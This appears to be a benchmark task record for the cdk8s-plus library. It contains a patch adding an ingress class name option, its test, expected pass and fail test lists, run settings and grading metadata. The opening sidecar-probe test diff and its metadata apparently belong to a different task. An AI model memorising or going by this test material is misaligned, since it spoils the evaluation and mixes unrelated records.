diff --git a/test/pod.test.ts b/test/pod.test.ts index 977e64da..17f44567 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -254,6 +254,45 @@ test('init containers cannot have startup probe', () => { }); +test('sidecar containers can have liveness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', liveness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].livenessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have readiness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', readiness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].readinessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have startup probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', startup: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].startupProbe).toBeTruthy(); + +}); + test('can specify init containers at instantiation', () => { const chart = Testing.chart();
[ "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new 
secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a 
managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown 
options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not 
provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init 
container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to 
multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Must be 
configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "custom configuration", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add 
environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", 
"spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B6", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": true }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4483", "https://github.com/sqren/backport", "https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to backport a fix that permits sidecar containers to have probes, but it does not describe how a sidecar is identified (the tests rely on init containers with restartPolicy=Always). The tests correctly assert that probes are now allowed for such containers, matching the intended behavior, yet the issue statement lacks this crucial detail, making the required knowledge implicit. 
This signals an IMPLICIT_KNOWLEDGE problem (B6).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
4922c60bbff6814fc3571079417990d90a57019d
2024-02-22 14:48:47
cdk8s-team__cdk8s-plus-3764
diff --git a/src/ingress.ts b/src/ingress.ts index 09bfceb7..983ddbbf 100644 --- a/src/ingress.ts +++ b/src/ingress.ts @@ -40,6 +40,14 @@ export interface IngressProps extends base.ResourceProps { * extension, if the ingress controller fulfilling the ingress supports SNI. */ readonly tls?: IngressTls[]; + + /** + * Class Name for this ingress. + * + * This field is a reference to an IngressClass resource that contains + * additional Ingress configuration, including the name of the Ingress controller. + */ + readonly className?: string; } /** @@ -90,6 +98,7 @@ export class Ingress extends base.Resource { metadata: props.metadata, spec: { defaultBackend: Lazy.any({ produce: () => this._defaultBackend?._toKube() }), + ingressClassName: props.className, rules: Lazy.any({ produce: () => this.synthRules() }), tls: Lazy.any({ produce: () => this.tlsConfig() }), },
fix(ingress): add `ingressClassName` to `IngressProps` (#2964) # Backport This will backport the following commits from `k8s-27/main` to `k8s-25/main`: - [fix(ingress): add `ingressClassName` to `IngressProps` (#2964)](https://github.com/cdk8s-team/cdk8s-plus/pull/2964) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Expose `ingressClassName` via Ingress properties **Problem** The library’s Ingress construct did not provide a way to specify the Kubernetes `ingressClassName`, preventing users from selecting a particular IngressClass or controller. **Root Cause** The Ingress property model omitted the class name field and consequently never populated the corresponding spec attribute. **Fix / Expected Behavior** - Introduce an optional class name property to the Ingress configuration interface. - Document the property as a reference to an IngressClass resource. - When the property is set, render it as `ingressClassName` in the generated Ingress manifest. - Omit the field from the manifest when the property is not provided, preserving existing output. - Maintain type safety and alignment with the upstream Kubernetes API. **Risk & Validation** - The addition is backward‑compatible because the new property is optional. - Verify through unit tests that the manifest includes `ingressClassName` only when the property is supplied. - Run the full test suite to confirm no regressions in other Ingress behavior.
3,764
cdk8s-team/cdk8s-plus
diff --git a/test/ingress.test.ts b/test/ingress.test.ts index 8f79dc36..65b63503 100644 --- a/test/ingress.test.ts +++ b/test/ingress.test.ts @@ -12,6 +12,36 @@ test('defaultChild', () => { }); +test('IngressClassName can be set', () => { + // GIVEN + const chart = Testing.chart(); + const service = new Service(chart, 'my-service', { ports: [{ port: 80 }] } ); + + // WHEN + new Ingress(chart, 'my-ingress', { + defaultBackend: IngressBackend.fromService(service), + className: 'myIngressClassName', + }); + + // THEN + expect(Testing.synth(chart).filter(x => x.kind === 'Ingress')).toStrictEqual([ + { + apiVersion: 'networking.k8s.io/v1', + kind: 'Ingress', + metadata: { name: 'test-my-ingress-c8135042' }, + spec: { + defaultBackend: { + service: { + name: 'test-my-service-c8493104', + port: { number: 80 }, + }, + }, + ingressClassName: 'myIngressClassName', + }, + }, + ]); +}); + describe('IngressBackend', () => { describe('fromService', () => { test('if the service exposes a port, it will be used by the ingress', () => {
[ "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Allows setting all options", "Applies default restart policy to 
pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can 
be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "default configuration", "custom configuration", "Can mutate metadata", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected 
namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports at instantiation", "cannot add an already existing port number", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount 
options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post 
instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by 
labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling 
strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", 
